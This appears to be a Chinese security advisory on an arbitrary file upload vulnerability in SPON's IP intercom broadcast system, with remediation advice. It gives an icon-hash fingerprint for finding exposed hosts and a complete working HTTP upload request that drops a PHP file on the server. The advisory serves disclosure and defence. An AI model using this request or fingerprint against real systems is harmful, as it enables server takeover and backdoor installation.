世邦通信 SPON IP网络对讲广播系统addscenedata.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/addscenedata.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
Accept-Encoding: gzip

------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="7788.php"
Content-Type: application/octet-stream

<?php echo 'ok';?>
------WebKitFormBoundary4LuoBRpTiVBo9cIQ--

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
GLAB-Mary33 分钟前
OSPF虚拟链路术语一览:快速掌握网络路由
网络·智能路由器
tan77º36 分钟前
【Linux网络编程】网络基础
linux·服务器·网络
缘友一世39 分钟前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
HMS Core2 小时前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
bing_1582 小时前
MQTT 和 HTTP 有什么本质区别?
网络·网络协议·http
Gauss松鼠会3 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
杨浦老苏4 小时前
Docker端口映射查看工具Dockpeek
网络·docker·群晖
未来之窗软件服务4 小时前
通过网页调用身份证阅读器http websocket方法-华视电子————仙盟创梦IDE
网络·网络协议·http·仙盟创梦ide·东方仙盟·硬件接入
创小匠5 小时前
创客匠人解析创始人 IP 定位:从专业度到用户心智的占领之道
网络·网络协议·tcp/ip
小赖同学啊5 小时前
基于区块链的物联网(IoT)安全通信与数据共享的典型实例
物联网·安全·区块链